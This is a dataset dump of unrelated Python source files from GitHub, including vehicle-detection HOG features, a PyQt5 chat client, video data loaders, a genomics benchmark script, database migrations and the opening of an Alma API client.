feature_vec=True))\n hog_features = np.ravel(hog_features)\n else:\n hog_features = get_hog_features(feature_image[:, :, hog_channel], orient,\n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n\n file_features.append(hog_features)\n\n # Append the new feature vector to the features list\n features.append(np.concatenate(file_features))\n\n # Return list of feature vectors\n return features\n\n\nif __name__ == \"__main__\":\n cars = glob.glob('./data/vehicles/**/*.png')\n notcars = glob.glob('./data/non-vehicles/**/*.png')\n car = mpimg.imread(cars[10])\n notcar = mpimg.imread(notcars[10])\n\n fig = plt.figure()\n plt.subplot(1, 2, 1)\n plt.title('Car')\n plt.imshow(car)\n\n plt.subplot(1, 2, 2)\n plt.imshow(notcar)\n plt.title('Not Car')\n\n fig.savefig('./output_images/sample_image.png')\n fig.clear()\n\n img = (car * 255).astype(np.uint8)\n\n from skimage.feature import hog\n\n img1 = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n hog_feat, hog_image = hog(img1[:, :, 0], orientations=9, pixels_per_cell=(8, 8), cells_per_block=(2, 2),\n visualise=True)\n # Preview\n fig = plt.figure()\n plt.subplot(1, 2, 1)\n plt.title('RGB')\n plt.imshow(img, cmap='gray')\n\n plt.subplot(1, 2, 2)\n plt.imshow(hog_image, cmap='gray')\n plt.title('HoG - YCrCb')\n fig.savefig('./output_images/hog_image1.png', bbox_inches='tight', pad_inches=0)\n fig.clear()\n\n img2 = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n hog_feat, hog_image = hog(img2[:, :, 0], orientations=8, pixels_per_cell=(10, 10), cells_per_block=(4, 4),\n visualise=True)\n # Preview\n fig = plt.figure()\n plt.subplot(1, 2, 1)\n plt.title('RGB')\n plt.imshow(img, cmap='gray')\n\n plt.subplot(1, 2, 2)\n plt.imshow(hog_image, cmap='gray')\n plt.title('HoG - YCrCb')\n fig.savefig('./output_images/hog_image2.png', bbox_inches='tight', pad_inches=0)\n fig.clear()\n","repo_name":"43061b4a/CarND-Vehicle-Detection","sub_path":"feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":6100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17425883421","text":"from PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QGridLayout, QLabel, QPushButton, QLineEdit, QTextEdit\nfrom PyQt5.QtCore import Qt\nimport sys\nimport socket\nimport threading\n\n\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n widget = QWidget()\n self.setWindowTitle(\"Un logiciel de tchat\")\n self.setCentralWidget(widget)\n self.__layout = QGridLayout()\n widget.setLayout(self.__layout)\n\n #Socket\n self.__socket = socket.socket()\n\n #Saisie Serveur\n self.__Server = QLabel('Serveur')\n self.__SaisieServer = QLineEdit('localhost')\n #self.__LineEditServer.setPlaceholderText('Serveur')\n\n #Saisie Port\n self.__Port = QLabel('Port')\n self.__SaisiePort = QLineEdit('10000')\n #self.__LineEditPort.setPlaceholderText('Port')\n\n # bouton de connexion\n self.__btnconnexion = QPushButton()\n self.__btnconnexion.setText('Connexion')\n #self.__btnconnexion.clicked.connect(self.__connect)\n\n\n #tchat\n self.__TchatBox = QTextEdit()\n self.__TchatBox.setReadOnly(True)\n self.__layout.setRowStretch(4, 0)\n\n #Saisie message\n self.__Message = QLabel('Message : ')\n self.__SaisieMessage = QLineEdit('')\n self.__SaisieMessage.setEnabled(False)\n\n #Envoyer message\n self.__Envoyer = QPushButton(\"Envoyer\")\n self.__Envoyer.setEnabled(False)\n\n #Effacer & Quiter\n self.__Effacer = QPushButton('Effacer')\n self.__Quitter = QPushButton('Quitter')\n #self.__quitbutton.clicked.connect(self.__quitter)\n\n self.__layout.addWidget(self.__Server, 0, 0)\n self.__layout.addWidget(self.__SaisieServer, 0, 1)\n self.__layout.addWidget(self.__Port, 1, 0)\n self.__layout.addWidget(self.__SaisiePort, 1, 1)\n self.__layout.addWidget(self.__btnconnexion, 3, 0, 1, 2)\n self.__layout.addWidget(self.__TchatBox, 4, 0, 1, 2)\n self.__layout.addWidget(self.__Message, 5, 0)\n self.__layout.addWidget(self.__SaisieMessage, 5, 1)\n self.__layout.addWidget(self.__Envoyer, 6, 0, 1, 2)\n self.__layout.addWidget(self.__Effacer, 8, 0, 1, 2)\n self.__layout.addWidget(self.__Quitter, 9, 0, 1, 2)\n\n self.__btnconnexion.clicked.connect(self.__connexion)\n self.__Envoyer.clicked.connect(self.__envoyer)\n self.__Effacer.clicked.connect(self.__effacer)\n self.__Quitter.clicked.connect(self.__quitter)\n #self.__quitter.clicked.connect(self.__actionquitter)\n\n self.__serverSocket = socket.socket()\n self.__force_stop = False\n self.__serverStarted = False\n self.__clients = []\n\n def __connexion(self):\n if self.__btnconnexion.text() == \"Deconnexion\":\n self.__btnconnexion.setText('Connexion')\n self.__Envoyer.setEnabled(False)\n self.__SaisieMessage.setEnabled(False)\n self.__socket.close()\n elif self.__btnconnexion.text() == \"Connexion\":\n self.__btnconnexion.setText('Deconnexion')\n self.__Envoyer.setEnabled(True)\n self.__SaisieMessage.setEnabled(True)\n PORT = self.__SaisiePort.text()\n PORT = int(PORT)\n SERVEUR = self.__SaisieServer.text()\n SERVEUR = str(SERVEUR)\n try:\n self.__socket.connect((SERVEUR, PORT))\n except:\n print(\"La connexion n'a pas pu être établie..\")\n\n def __envoyer(self):\n self.__thread = threading.Thread(target=self.__reception, args=[self.__socket])\n self.__thread.start()\n x = self.__SaisieMessage.text()\n self.__TchatBox.setAlignment(Qt.AlignRight)\n self.__TchatBox.append(x)\n self.__socket.send(x.encode())\n self.__SaisieMessage.clear()\n\n def __effacer(self):\n self.__TchatBox.setPlainText(\"\")\n\n def __quitter(self):\n if self.__btnconnexion.text() == \"Connexion\":\n self.__TchatBox.append('deco-serveur')\n self.__socket.close()\n else:\n self.__socket.close()\n\n def __reception(self, conn):\n\n data = \"\"\n while data != \"deco-server\":\n data = str(conn.recv(1024).decode())\n self.__TchatBox.setAlignment(Qt.AlignLeft)\n self.__TchatBox.append(data)\n\n","repo_name":"Jaaftl/R3.09","sub_path":"Examen_R309.py","file_name":"Examen_R309.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29435945176","text":"import os\nimport os.path as osp\nimport math\nimport random\nimport pickle\nimport warnings\n\nimport glob\nimport h5py\nimport numpy as np\n\nimport torch\nimport torch.utils.data as data\nimport torch.nn.functional as F\nimport torch.distributed as dist\nfrom torchvision.datasets.video_utils import VideoClips\nimport pytorch_lightning as pl\n\n\nclass VideoDataset(data.Dataset):\n \"\"\" Generic dataset for videos files stored in folders\n Returns BCTHW videos in the range [-0.5, 0.5] \"\"\"\n exts = ['avi', 'mp4', 'webm']\n\n def __init__(self, data_folder, sequence_length, train=True, resolution=64):\n \"\"\"\n Args:\n data_folder: path to the folder with videos. The folder\n should contain a 'train' and a 'test' directory,\n each with corresponding videos stored\n sequence_length: length of extracted video sequences\n \"\"\"\n super().__init__()\n self.train = train\n self.sequence_length = sequence_length\n self.resolution = resolution\n\n folder = osp.join(data_folder, 'train' if train else 'test')\n files = sum([glob.glob(osp.join(folder, '**', f'*.{ext}'), recursive=True)\n for ext in self.exts], [])\n\n # hacky way to compute # of classes (count # of unique parent directories)\n self.classes = list(set([get_parent_dir(f) for f in files]))\n self.classes.sort()\n self.class_to_label = {c: i for i, c in enumerate(self.classes)}\n\n warnings.filterwarnings('ignore')\n cache_file = osp.join(folder, f\"metadata_{sequence_length}.pkl\")\n if not osp.exists(cache_file):\n clips = VideoClips(files, sequence_length, num_workers=32)\n pickle.dump(clips.metadata, open(cache_file, 'wb'))\n else:\n metadata = pickle.load(open(cache_file, 'rb'))\n clips = VideoClips(files, sequence_length,\n _precomputed_metadata=metadata)\n self._clips = clips\n\n @property\n def n_classes(self):\n return len(self.classes)\n\n def __len__(self):\n return self._clips.num_clips()\n\n def __getitem__(self, idx):\n resolution = self.resolution\n video, _, _, idx = self._clips.get_clip(idx)\n\n class_name = get_parent_dir(self._clips.video_paths[idx])\n label = self.class_to_label[class_name]\n return dict(video=preprocess(video, resolution), label=label)\n\n\ndef get_parent_dir(path):\n return osp.basename(osp.dirname(path))\n\n\ndef preprocess(video, resolution, sequence_length=None):\n # video: THWC, {0, ..., 255}\n video = video.permute(0, 3, 1, 2).float() / 255. # TCHW\n t, c, h, w = video.shape\n\n # temporal crop\n if sequence_length is not None:\n assert sequence_length <= t\n video = video[:sequence_length]\n\n # scale shorter side to resolution\n scale = resolution / min(h, w)\n if h < w:\n target_size = (resolution, math.ceil(w * scale))\n else:\n target_size = (math.ceil(h * scale), resolution)\n video = F.interpolate(video, size=target_size, mode='bilinear',\n align_corners=False)\n\n # center crop\n t, c, h, w = video.shape\n w_start = (w - resolution) // 2\n h_start = (h - resolution) // 2\n video = video[:, :, h_start:h_start + resolution, w_start:w_start + resolution]\n video = video.permute(1, 0, 2, 3).contiguous() # CTHW\n\n video -= 0.5\n\n return video\n\n\nclass HDF5Dataset(data.Dataset):\n \"\"\" Generic dataset for data stored in h5py as uint8 numpy arrays.\n Reads videos in {0, ..., 255} and returns in range [-0.5, 0.5] \"\"\"\n def __init__(self, data_file, sequence_length, train=True, resolution=64):\n \"\"\"\n Args:\n data_file: path to the pickled data file with the\n following format:\n {\n 'train_data': [B, H, W, 3] np.uint8,\n 'train_idx': [B], np.int64 (start indexes for each video)\n 'test_data': [B', H, W, 3] np.uint8,\n 'test_idx': [B'], np.int64\n }\n sequence_length: length of extracted video sequences\n \"\"\"\n super().__init__()\n self.train = train\n self.sequence_length = sequence_length\n self.resolution = resolution\n\n # read in data\n self.data_file = data_file\n self.data = h5py.File(data_file, 'r')\n self.prefix = 'train' if train else 'test'\n self._images = self.data[f'{self.prefix}_data']\n self._idx = self.data[f'{self.prefix}_idx']\n self.size = len(self._idx)\n\n @property\n def n_classes(self):\n raise Exception('class conditioning not support for HDF5Dataset')\n\n def __getstate__(self):\n state = self.__dict__\n state['data'] = None\n state['_images'] = None\n state['_idx'] = None\n return state\n\n def __setstate__(self, state):\n self.__dict__ = state\n self.data = h5py.File(self.data_file, 'r')\n self._images = self.data[f'{self.prefix}_data']\n self._idx = self.data[f'{self.prefix}_idx']\n\n def __len__(self):\n return self.size\n\n def __getitem__(self, idx):\n start = self._idx[idx]\n end = self._idx[idx + 1] if idx < len(self._idx) - 1 else len(self._images)\n assert end - start >= 0\n\n start = start + np.random.randint(low=0, high=end - start - self.sequence_length)\n assert start < start + self.sequence_length <= end\n video = torch.tensor(self._images[start:start + self.sequence_length])\n return dict(video=preprocess(video, self.resolution))\n\n\nclass VideoData(pl.LightningDataModule):\n\n def __init__(self, args):\n super().__init__()\n self.args = args\n\n @property\n def n_classes(self):\n dataset = self._dataset(True)\n return dataset.n_classes\n\n\n def _dataset(self, train):\n Dataset = VideoDataset if osp.isdir(self.args.data_path) else HDF5Dataset\n dataset = Dataset(self.args.data_path, self.args.sequence_length,\n train=train, resolution=self.args.resolution)\n return dataset\n\n\n def _dataloader(self, train):\n dataset = self._dataset(train)\n if dist.is_initialized():\n sampler = data.distributed.DistributedSampler(\n dataset, num_replicas=dist.get_world_size(), rank=dist.get_rank()\n )\n else:\n sampler = None\n dataloader = data.DataLoader(\n dataset,\n batch_size=self.args.batch_size,\n num_workers=self.args.num_workers,\n pin_memory=True,\n sampler=sampler,\n shuffle=sampler is None\n )\n return dataloader\n\n def train_dataloader(self):\n return self._dataloader(True)\n\n def val_dataloader(self):\n return self._dataloader(False)\n\n def test_dataloader(self):\n return self.val_dataloader()\n","repo_name":"wilson1yan/VideoGPT","sub_path":"videogpt/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"60"} +{"seq_id":"22089514829","text":"## Quick code to collect all benchmark information\n\nimport glob\nimport os\nimport pandas as pd\nimport re\nimport argparse\n\n\ndef extract_information(sample, path=''):\n \"\"\"\n Function to extract information for a given sample\n :params path: parent directory from which all the remaining directories can be found\n :params sample: name of the sample so that we can extract info regarding all those samples\n :return: The output is a dictionary for each rule with the associated **minutes** that each rule required to execute\n \"\"\"\n \n benchmark_dict = {}\n\n list_files_fastqc = os.listdir(path+'fastqc_out/')\n list_benchmark = [i for i in list_files_fastqc if re.search('.benchmark$', i)]\n\n value = 0\n for i in list_benchmark:\n \n df = pd.read_csv(path+'fastqc_out/'+i, delimiter=' ')\n value += df.s.values[0]\n\n value_seqtk = 0\n for i in os.listdir(path+'OUTPUT3/'+sample+'/seqtk/'):\n\n df = pd.read_csv(path+'OUTPUT3/'+sample+'/seqtk/'+i, delimiter=' ')\n value_seqtk += df.s.values[0]\n\n ## Fastqc\n benchmark_dict['fastqc'] = round(value/60, 2)\n\n ## Seqtk\n benchmark_dict['Seqtk'] = round(value_seqtk/60, 2) \n\n ## Bwa\n benchmark_dict['Bwa'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/bwa/'+sample+'.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## SamBlaster\n benchmark_dict['SamBlaster'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/bwa/'+sample+'_samblaster.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## SamSort\n benchmark_dict['SamSort'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/bwa/'+sample+'_sort_nodup.sam.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## SamIndex\n benchmark_dict['SamIndex'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/bwa/'+sample+'_sort_nodup.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## BaseRecalibrator\n benchmark_dict['BaseRecalibrator'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/gatk_bsr/'+sample+'_sort_nodup.recaldat.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## ApplyBQSR\n benchmark_dict['ApplyBQSR'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/gatk_bsr/'+sample+'_sort_nodup.bqsr.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## HaplotypeCaller\n benchmark_dict['HaploType'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/gatk_gvcf/'+sample+'_sort_nodup.g.vcf.benchmark', delimiter=' ').s.values[0]/60, 2)\n \n return benchmark_dict\n\n\ndef extract_info_list(id_, sample, path):\n\n l = []\n deli = '\\t'\n\n list_files_fastqc = os.listdir(path+'fastqc/')\n list_benchmark = [i for i in list_files_fastqc if re.search('.benchmark$', i)]\n\n value = 0\n for i in list_benchmark:\n\n df = pd.read_csv(path+'fastqc/'+i, delimiter=deli)\n value += df.s.values[0]\n\n # ID\n l.append(id_)\n\n ## Fastqc\n l.append(round(value/60, 2))\n\n ## Bwa\n try:\n l.append(round(pd.read_csv(path+'bwa/'+sample+'.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## SamBlaster\n try:\n l.append(round(pd.read_csv(path+'bwa/'+sample+'_samblaster.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## SamSort\n try:\n l.append(round(pd.read_csv(path+'bwa/'+sample+'_sort_nodup.sam.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## BaseRecalibrator\n try:\n l.append(round(pd.read_csv(path+'gatk_bsr/'+sample+'_sort_nodup.recaldat.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## ApplyBQSR\n try:\n l.append(round(pd.read_csv(path+'gatk_bsr/'+sample+'_sort_nodup.bqsr.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## Haplotype\n try:\n l.append(round(pd.read_csv(path+'gatk_gvcf/tmp_'+sample+'_sort_nodup.g.vcf.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## File size\n size = round(os.path.getsize(path + sample + '_R1.fastq.gz')*1e-9, 2)\n size += round(os.path.getsize(path + sample + '_R1.fastq.gz')*1e-9, 2)\n l.append(size)\n\n return l\n\n\nif __name__ == \"__main__\":\n \n parser = argparse.ArgumentParser(description='Collect Benchmark Information')\n parser.add_argument(\"--path\", type=str)\n\n args = parser.parse_args()\n path = args.path\n\n centers = ['1a77728b-011a-4407-b60e-ec90b6430b99', 'ed615b8d-fa86-48bb-b0f8-c841e1aeb0eb', 'd7c41726-13a8-4abd-b185-68198fec12f4', \n 'fb203f69-94b9-42aa-9f34-c9ee8219a22e', \n 'eaabd6f1-1b34-4196-882c-198465045d71']\n\n\n data = [['id', 'fastqc', 'bwa', 'samblaster', 'samsort', 'base', 'apply', 'haplo', 'size (GB)', 'total time (min)']]\n\n for center in centers:\n for study in os.listdir(path + '/' + center + '/'):\n for sample in os.listdir(path + '/' + center + '/' + study + '/'):\n path_parent = path + '/' + center + '/' + study + '/' + sample + '/'\n try:\n samples = [os.path.basename(x) for x in glob.glob(path_parent + '/*.gz')][0]\n samples = samples[:-12]\n except IndexError as e:\n print('Cannot find .gz files for this sample')\n continue\n\n tmp = extract_info_list(id_=center + '||' + study + '||' + sample, sample = samples, path = path_parent)\n tmp.append(sum(tmp[1:8]))\n data.append(tmp)\n\n\n print('FINISHED')\n print('==================================')\n print('==================================')\n print('==================================')\n df = pd.DataFrame(data[1:], columns=data[0])\n bins = [0, 5, 10, 15, 20, 25]\n bins1 = [i for i in range(25)]\n df['size_bin'] = pd.cut(df['size (GB)'], bins)\n df['size_bin_small'] = pd.cut(df['size (GB)'], bins1) \n \n x = df.groupby(['size_bin'])['total time (min)'].mean()\n plot = x.plot(kind='bar', xlabel='Size Bucket', ylabel='Processing Time (min)', title='Computational Processing \\n Benchmark')\n fig = plot.get_figure()\n fig.savefig(\"output.png\", bbox_inches='tight')\n # df.to_csv('res.csv')\n df1 = df[(df.size_bin_small == pd.Interval(5, 6, closed='right')) | \n (df.size_bin_small == pd.Interval(10, 11, closed='right')) | \n (df.size_bin_small == pd.Interval(22, 23, closed='right'))]\n print(df1.head())\n x = df1.groupby(['size_bin_small'])[['fastqc', 'bwa', 'samsort', 'base', 'apply', 'haplo']].mean().dropna()\n print(x)\n plot = x.T.plot(kind='bar')\n fig = plot.get_figure()\n fig.savefig(\"output1.png\", bbox_inches='tight')\n\n\n \n\n","repo_name":"JuanMataNaranjo/CINECA_repo","sub_path":"benchmark/benchmark_collector.py","file_name":"benchmark_collector.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18543476290","text":"\"\"\"empty message\n\nRevision ID: 631083893e51\nRevises: c58701958f34\nCreate Date: 2022-08-12 10:10:57.380721\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '631083893e51'\ndown_revision = 'c58701958f34'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('conversations',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('creator_id', sa.Integer(), nullable=False),\n sa.Column('participant_id', sa.Integer(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['creator_id'], ['users.id'], ),\n sa.ForeignKeyConstraint(['participant_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('conversation_id', sa.Integer(), nullable=False),\n sa.Column('sender_id', sa.Integer(), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['conversation_id'], ['conversations.id'], ),\n sa.ForeignKeyConstraint(['sender_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('messages')\n op.drop_table('conversations')\n # ### end Alembic commands ###\n","repo_name":"ShanFalk/BunsInYourArea","sub_path":"migrations/versions/20220812_101057_.py","file_name":"20220812_101057_.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3352736843","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom resources import SOPLS\n\nY_df = pd.read_table('./data/D.txt', index_col=0)\nY = Y_df.values\nX1_df = pd.read_table('./data/A.txt', index_col=0)\nX1 = X1_df.values\nX2_df = pd.read_table('./data/B.txt', index_col=0)\nX2 = X2_df.values\nX3_df = pd.read_table('./data/C.txt', index_col=0)\nX3 = X3_df.values\nX = np.hstack([X1, X2, X3])\nblocks = np.hstack([np.ones(X1.shape[1]),np.ones(X2.shape[1])*2,np.ones(X3.shape[1])*3])\n\nmlf = make_pipeline(SOPLS.SOPLS(blocks=blocks, ncomp=[5,3,7], max_comp=10, wide_data=True))\nmlf.fit(X,Y)\nmlf.predict(X)\nmlf2 = make_pipeline(StandardScaler(),SOPLS.SOPLS(blocks=blocks, ncomp=[5,3,7], max_comp=10, wide_data=True))\nmlf2.fit(X,Y)\nprint(mlf2.predict(X))","repo_name":"NMBU-Data-Science/multi-hoggorm","sub_path":"src/legacy/resources/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33692700772","text":"import wget\nimport gzip\nimport os\nimport re\nimport numpy as np\nimport random\n\n# defining the URLs for the data sets\nURLS = {\n \"GrQc\": \"https://snap.stanford.edu/data/ca-GrQc.txt.gz\",\n \"HepPh\": \"https://snap.stanford.edu/data/ca-HepPh.txt.gz\",\n \"AstroPh\": \"https://snap.stanford.edu/data/ca-AstroPh.txt.gz\",\n \"CondMat\": \"https://snap.stanford.edu/data/ca-CondMat.txt.gz\"\n}\n\n\ndef download_and_extract(url):\n # name of the file to download\n file_name = url.split('/')[-1]\n\n # if the file is not already downloaded, do it\n if file_name not in os.listdir(\".\"):\n wget.download(url=url)\n\n # extracting data\n lines = []\n with gzip.open(file_name, \"r\") as file:\n for line in file:\n lines.append(line)\n return lines\n\n\ndef import_data(path):\n counter = 0\n edges = []\n regex = re.compile(b'[0-9]+')\n with gzip.open(path, 'rb') as file:\n for line in file:\n if counter > 0:\n edge = regex.findall(line)\n if len(edge) == 2:\n edges.append(tuple([str(edge[0]), str(edge[1])]))\n counter += 1\n\n return edges\n\n\ndef quick_sample(set_of_nodes, probabilities):\n \"\"\"\n quickly generate a random element from a set of nodes\n :param set_of_nodes: set of nodes from which we want to return a random sample\n :param probabilities: drawing probabilities in ascending order\n :return: a random node index\n \"\"\"\n return list(set_of_nodes)[np.searchsorted(probabilities, random.random())]\n\n\nif __name__ == \"__main__\":\n data_ = import_data(path='ca-GrQc.txt.gz')\n print(data_)\n","repo_name":"pauldechorgnat/master_thesis","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37036567236","text":"\"\"\"\nAdd Tweet model\n\nRevision ID: f96c8e4abc04\nRevises: 4a68ff6f9e11\nCreate Date: 2018-07-18 00:36:41.290158\n\n\"\"\"\nfrom alembic import op\nfrom microcosm_postgres.models import UTCDateTime\nfrom sqlalchemy import (\n Column,\n ForeignKeyConstraint,\n PrimaryKeyConstraint,\n String,\n UniqueConstraint,\n)\nfrom sqlalchemy_utils import UUIDType\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f96c8e4abc04'\ndown_revision = '4a68ff6f9e11'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('tweet',\n Column('id', UUIDType, nullable=False),\n Column('created_at', UTCDateTime(), nullable=False),\n Column('updated_at', UTCDateTime(), nullable=False),\n Column('user_id', UUIDType, nullable=False),\n Column('tweet_content', String(length=280), nullable=False),\n ForeignKeyConstraint(['user_id'], ['user.id'], ),\n PrimaryKeyConstraint('id')\n )\n\n\ndef downgrade():\n op.drop_table('tweet')\n","repo_name":"sindyjlee/rest-api","sub_path":"tweetthis/migrations/f96c8e4abc04_add_tweet_model.py","file_name":"f96c8e4abc04_add_tweet_model.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"42340647204","text":"import json\nimport sys\nfrom carla import *\n\nclass Macchina:\n\n def __init__(self, client, x, y, z, angle=0):\n self.scene = {\"map\": []}\n self.client = client\n\n # Spawn generator\n world = client.get_world()\n bp = world.get_blueprint_library()\n msh = bp.find(\"meshholder.mesh\")\n msh_loc = Location(x=x, y=y, z=z)\n transform = Transform(msh_loc, Rotation(yaw=angle))\n self.generator = world.spawn_actor(msh, transform)\n\n def addObject(self, objectTag, x, y, angle=0):\n self.scene[\"map\"].append({\"obj\": int(objectTag), \"x\": x, \"y\": y, \"angle\": angle})\n\n def spawn(self):\n self.generator.set_scene(json.dumps(self.scene))\n","repo_name":"ThierryDeruyttere/carla-simulator-mac","sub_path":"macchina/macchina.py","file_name":"macchina.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"8915124151","text":"# author: Xia Wei, xiaw@sibet.ac.cn\r\n# paper: Deep Learning for Automatic Differential Diagnosis of\r\n# Primary Central Nervous System Lymphoma and\r\n# Glioblastoma: Multi-parametric MRI based Convolutional\r\n# Neural Network Model\r\n# date: 02/13/2021\r\n\r\n# for radiomics modelling\r\n\r\nimport radiomics.featureextractor as FEE\r\nimport os\r\nimport csv\r\nimport pandas as pd\r\nimport numpy as np\r\nimport SimpleITK as sitk\r\nimport cv2\r\n\r\npara_path = './Params.yaml'\r\nextractor = FEE.RadiomicsFeaturesExtractor(para_path)\r\nextractor.addProvenance(provenance_on=False)\r\nprint(\"Extraction parameters:\\n\\t\", extractor.settings)\r\nprint(\"Enabled filters:\\n\\t\", extractor._enabledImagetypes)\r\nprint(\"Enabled features:\\n\\t\", extractor._enabledFeatures)\r\n\r\ntumor_type = 'GBM'\r\nimg_name = 'T2F'\r\nsuffix = '.nii.gz'\r\nmask_name = 'WholeTumor'\r\n\r\nimg_path = 'R:\\\\brain_tumor\\\\' + tumor_type + '\\\\' + tumor_type + '-nii\\\\'\r\nresult_path = './rad_features_' + tumor_type + '_' + img_name + '.csv'\r\n##\r\nprint('img dir is: ', img_path)\r\n\r\ndf = pd.DataFrame()\r\n\r\nif os.path.exists(img_path):\r\n dir_name_list = os.listdir(img_path)\r\n dir_name_list = list(map(int, dir_name_list))\r\n dir_name_list.sort()\r\n num = 0\r\n for nii_dir in dir_name_list: # nii_dir -- patient ID, and include all imgs and mask\r\n img_path_i = img_path + str(nii_dir) + '\\\\' + img_name + suffix\r\n mask_path_i = img_path + str(nii_dir) + '\\\\' + mask_name + suffix\r\n assert os.path.exists(img_path_i) and os.path.exists(mask_path_i)\r\n\r\n roi = sitk.ReadImage(mask_path_i)\r\n image = sitk.ReadImage(img_path_i)\r\n # image = sitk.Normalize(image) # normalize: True\r\n\r\n result = extractor.execute(image, roi)\r\n # except Exception:\r\n # print(dirName)\r\n # exit(1)\r\n keys, values = ['id'], [str(nii_dir)]\r\n for k, v in result.items():\r\n keys.append(k)\r\n values.append(v)\r\n\r\n if num == 0:\r\n df = pd.DataFrame(columns=keys)\r\n df.loc[str(nii_dir)] = values\r\n else:\r\n df.loc[str(nii_dir)] = values\r\n\r\n print(\"Result type:\", type(result)) # result is returned in a Python ordered dictionary\r\n print()\r\n print(str(nii_dir))\r\n print(\"patient \" + str(nii_dir) + \"--\" + tumor_type + '_' + img_name + \" Features Calculated\")\r\n num = num + 1\r\n # df.drop(df.columns[0], axis=1, inplace=True)\r\n df.to_csv(result_path, index=False)\r\n","repo_name":"xiawei999000/GBM_PCNSL_CNN_modeling","sub_path":"radiomics_modeling/feature_extraction_program/pyra_feaex.py","file_name":"pyra_feaex.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"60"} +{"seq_id":"17147710442","text":"import json\nimport logging\nimport time\nfrom datetime import datetime\nfrom typing import Generator, Optional\nfrom urllib.parse import urljoin\n\nimport requests\n\nfrom sapinvoices.config import load_config_values as load_alma_config\n\nlogger = logging.getLogger(__name__)\n\n\nclass AlmaClient:\n \"\"\"AlmaClient class.\n\n An Alma API client with specific functionality necessary for SAP\n processing.\n\n Notes:\n - All requests to the Alma API include a 0.1 second wait to ensure we don't\n exceed the API rate limit.\n - If no records are found for a given endpoint with the provided parameters,\n Alma will still return a 200 success response with a json object of\n {\"total_record_count\": 0} and these methods will return that object.\n\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize AlmaClient instance.\"\"\"\n alma_config = load_alma_config()\n self.base_url = alma_config[\"ALMA_API_URL\"]\n self.headers = {\n \"Authorization\": f\"apikey {alma_config['ALMA_API_READ_WRITE_KEY']}\",\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n }\n self.timeout = float(alma_config[\"TIMEOUT\"])\n\n def create_invoice(self, invoice_json: dict) -> dict:\n \"\"\"Create an 